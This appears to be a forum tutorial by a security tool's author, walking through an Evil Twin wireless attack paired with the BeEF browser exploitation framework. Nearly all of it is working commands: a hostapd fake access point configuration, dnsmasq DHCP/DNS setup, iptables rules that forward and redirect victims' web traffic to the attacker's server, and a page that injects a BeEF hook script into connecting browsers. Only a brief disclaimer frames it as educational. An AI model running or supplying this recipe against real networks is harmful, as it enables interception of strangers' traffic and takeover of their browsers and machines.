Hello all,
I'm the author of Infernal Wireless Suite. Today, I'd like to teach you how to perform an Evil Twin attack, along with utilizing the BeEF Framework to compromise a target machine during penetration tests or red team exercises.
First thing first, what is an Evil Twin attack?
An Evil Twin attack is when you attempt to impersonate a wireless access point and lure probing devices to connect to you. This way, you're acting as a legitimate access point and proving internet through your own internet access interface. Any victim connected to your fake access point would be subject to data interception. More information can be found here: https://en.wikipedia.org/wiki/Evil_twin_(wireless_networks)
Second, what is the BeEF Framework ?
BeEF is browser exploitation framework focused on browser exploitation. This framework is used mainly during penetration test and via JavaScript injection into the browser content, mainly via XSS exploitation or content manipulation. This tool allows the attacker to take control of compromised machine, insert key logger and much more. You can find more information here: http://beefproject.com/
Now, as the title implies, I'd like to show you one of the attack vectors I implemented in my tool, infernal wireless, and I wanted to show you how to do it manually.
Warning:
This tutorial is only for educational and professional use.
Please don't use for illegal purposes!!
Note:
My network cards are as follows:
wlan0 - wireless Interface name, yours might be different, replace if needed
eth0 - internet facing interface name, yours might be different, replace if needed
Prerequisites:
Preferred OS: Kali Linux
Install: hostapd, dnsmasq, BeeF Framework
First, we need to create a fake Access Point with a desired name.
Step 1: Create a configuration file for hostapd
Type the following into a free_AP.conf and save it.
interface=wlan0 # (change this if it differs from yours)
driver=nl80211
ssid= <fakeAPName> # you access Point name
channel=1
Execute:
hostapd free_AP.conf &
Step 2: Configure DNS Settings:
From a command prompt, execute below:
sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd
cat <<EOF > /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
interface=wlan0 # this is your wireless interface, change if different
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
EOF
Execute:
service dnsmasq start
Step 3 - Set up NAT Table:
Execute the following from the command line:
ifconfig wlan0 up
ifconfig wlan0 10.0.0.1/24
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward
Step 4 - Set up BeEF and HTTP Service:
From command line or by any other means you have, enable HTTP Service:
/etc/init.d/apache2 start
Create index.html under your root folder .i.e /var/www/html/index.html and write the code below:
<html>
<body>
<script src="http://10.0.0.1:3000/hook.js"></script>
</body>
</html>
Step 5 - Another iptable set up:
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE
Step 6 - Launch BeEF Framework:
From the command prompt, execute this:
firefox http://127.0.0.1:3000/ui/panel &
Login credentials are beef:beef
Now, it's just a matter of waiting till someone connects to your network.
The demo video can be seen here: https://www.youtube.com/watch?v=pVY5azLJMPY
Now, wait. If you want to use the automated too that I created, you may download here: https://github.com/entropy1337/infernal-twin
Thank you